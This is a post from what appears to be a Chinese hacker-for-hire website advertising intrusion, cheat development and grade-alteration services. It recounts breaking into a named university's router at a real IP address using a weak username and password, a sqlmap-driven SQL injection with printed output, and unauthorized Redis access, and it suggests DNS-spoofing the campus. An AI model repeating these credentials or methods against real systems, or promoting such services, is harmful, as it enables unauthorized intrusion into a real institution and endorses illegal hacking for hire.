HackAPT-打造中国最专业的黑客入侵技术 - 承接一切黑客渗透测试业务

渗透中国人民大学核心路由

HackAPT - 打造中国最专业的黑客入侵技术长期承接国内外网站入侵,网络渗透,外挂开发,成绩修改等相关黑客业务. 本团队拥有多位资深老牌黑客,技术实力雄厚有着长期的职业黑客经验并且长期持有CEH,CCIE黑客认证,且长期活跃于Hackone排行榜并帮助过Facebook, Microsoft, Uber, Yahoo日本发现过重大漏洞. 我们的承诺和信心来自于多年入侵经验的成功案例,我们用实力来得到您的认可客服QQ:10172680 邮箱[email protected]

本站所有内容均属于本站原创,请尊重版权转载请附上本站链接.

废话部多说,直接上网址:http://222.29.240.102/

漏洞一:弱口令

软件扫描出来一个弱口令

帐号user

密码123456

成功进入后台

可以查看全校的网络状态

可以新建任务,管理任务,

在这里如果修改了对应网站,可以对全校进行dns欺骗吧?

漏洞证明:

漏洞二:登录界面存在POST注入,抓包丢sqlmap跑一下

Database: information_schema
Table: mem_pwd
[77 columns]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| administrateur | numeric |
| advid | numeric |
| affiliate | numeric |
| alert_id | numeric |
| allowcensorword | numeric |
| attribute_sku_id | numeric |
| btt_id | numeric |
| canchangenickname | non-numeric |
| charge | numeric |
| chost | numeric |
| client_url | numeric |
| comment4 | numeric |
| committee_id | numeric |
| company | numeric |
| country_id | numeric |
| cvv2 | numeric |
| db_value | numeric |
| email | numeric |
| fichier | numeric |
| fjalekalimin | numeric |
| functionid | numeric |
| id_breve | numeric |
| id_document | numeric |
| id_forum | numeric |
| id_paciente | numeric |
| ide | numeric |
| idutente | numeric |
| isbn | non-numeric |
| jobid | numeric |
| lahir | numeric |
| license | numeric |
| lid | numeric |
| loginpass | numeric |
| luogoid | numeric |
| menutype | numeric |
| mod_custom | numeric |
| mod_date | numeric |
| mod_freeway_services | numeric |
| module_code | numeric |
| n_compte | numeric |
| nama_pengguna | numeric |
| newnotices | numeric |
| newsfeeds | numeric |
| ono | numeric |
| os | non-numeric |
| pagebreak | numeric |
| part_id | numeric |
| petty | numeric |
| php_dir | numeric |
| platform | numeric |
| pluginhookid | numeric |
| preference_id | numeric |
| prune_id | numeric |
| question | numeric |
| rachunki | numeric |
| rankid | non-numeric |
| resolution_id | numeric |
| role_id | numeric |
| sb_pwd | numeric |
| secid | numeric |
| secret | numeric |
| send | numeric |
| slogan | numeric |
| sub_image6 | numeric |
| sub_title6 | numeric |
| submitted_by | numeric |
| super | numeric |
| texto | numeric |
| today | numeric |
| todaycount | numeric |
| total | numeric |
| triggerid | numeric |
| typename | non-numeric |
| u6216 | numeric |
| unique_id | numeric |
| unit | numeric |
| updated_at | numeric |
+----------------------+-------------+

漏洞三:redis数据库未授权访问

HackAPT - 打造中国最专业的黑客入侵技术长期承接国内外网站入侵,网络渗透,外挂开发,成绩修改等相关黑客业务. 本团队拥有多位资深老牌黑客,技术实力雄厚有着长期的职业黑客经验并且长期持有CEH,CCIE黑客认证,且长期活跃于Hackone排行榜并帮助过Facebook, Microsoft, Uber, Yahoo日本发现过重大漏洞. 我们的承诺和信心来自于多年入侵经验的成功案例,我们用实力来得到您的认可客服QQ:10172680 邮箱[email protected]

本站所有内容均属于本站原创,请尊重版权转载请附上本站链接.

本文系作者个人观点,转载请注明出处!
喜欢 1

相关文章

更多

本站已经正式停止QQ联系方式,如有任何正在合作的客户或有意合作的客户可以通过  [email protected] 跟我们联系!

邮件24小时在线,通常1-2小时会回复!

error: